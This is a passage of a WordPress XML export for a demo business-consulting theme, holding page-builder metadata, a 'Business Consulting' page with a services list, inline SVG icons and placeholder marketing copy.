		<wp:meta_value><![CDATA[a:10:{s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:2;s:22:"typography_font_weight";i:3;s:25:"typography_text_transform";i:1;s:27:"typography_font_size_mobile";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:3;s:15:"_padding_mobile";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:5:{s:9:"btn_style";i:2;s:4:"text";i:3;s:5:"align";i:1;s:12:"align_mobile";i:1;s:4:"link";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:15;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:15;s:19:"_inline_size_tablet";i:10;s:19:"_inline_size_mobile";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:3;s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:3;s:3:"gap";i:5;s:16:"content_position";i:3;}s:17:"section_structure";a:1:{s:9:"structure";i:5;}}s:5:"style";a:2:{s:18:"section_background";a:8:{s:21:"background_background";i:4;s:16:"background_image";i:3;s:19:"background_position";i:3;s:26:"background_position_mobile";i:1;s:17:"background_repeat";i:3;s:15:"background_size";i:3;s:22:"background_size_tablet";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:7:"padding";i:7;s:14:"padding_tablet";i:2;s:14:"padding_mobile";i:5;}}}}s:8:"iheading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:3;s:5:"title";i:3;s:11:"header_size";i:3;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:3;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:9:{s:9:"stitle_bg";i:3;s:27:"title_typography_typography";i:3;s:33:"title_typography_font_size_mobile";i:3;s:28:"stitle_typography_typography";i:3;s:27:"stitle_typography_font_size";i:3;s:14:"subtitle_style";i:2;s:12:"stitle_color";i:3;s:29:"stitle_typography_font_weight";i:3;s:11:"title_color";i:1;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_tablet";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:2;s:10:"image_size";i:2;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:4;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:5:"align";i:4;s:9:"icon_font";i:4;s:5:"title";i:4;s:3:"des";i:4;s:8:"btn_text";i:4;}}s:5:"style";a:3:{s:17:"style_box_section";a:8:{s:7:"is_line";i:4;s:11:"box_padding";i:4;s:16:"bg_hover_icon_bg";i:4;s:18:"bg_hover_des_color";i:4;s:6:"bg_box";i:4;s:12:"bg_hover_box";i:4;s:19:"bg_hover_icon_color";i:4;s:23:"bg_hover_link_btn_color";i:4;}s:18:"style_icon_section";a:5:{s:9:"is_border";i:4;s:10:"icon_space";i:4;s:9:"icon_size";i:4;s:13:"icon_bg_width";i:4;s:7:"icon_bg";i:4;}s:21:"style_content_section";a:7:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;s:28:"title_typography_font_weight";i:1;s:9:"des_color";i:4;s:25:"des_typography_typography";i:4;s:26:"des_typography_font_family";i:4;s:24:"des_typography_font_size";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:5:"itabs";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_tabs";i:1;}}s:5:"style";a:1:{s:11:"style_title";a:2:{s:11:"title_space";i:1;s:18:"title_width_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Consulting</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services/business-consulting/</link>
		<pubDate>Thu, 17 Sep 2020 08:25:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=977</guid>
		<description></description>
		<content:encoded><![CDATA[<h5>Services</h5>		
					<ul>
							<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										marketing research
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Organizational Audit
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										business consulting
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										project management
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										support functions
											</a>
									</li>
								<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">						
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										finance planning
											</a>
									</li>
						</ul>
			<h5>Brochures</h5>		
											<a href="#">
							<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home4.jpg" alt="" loading="lazy" />								</a>
			<h3>Strategic & Tactical Planning</h3>		
		<p>It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.</p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.</p>		
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Government Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 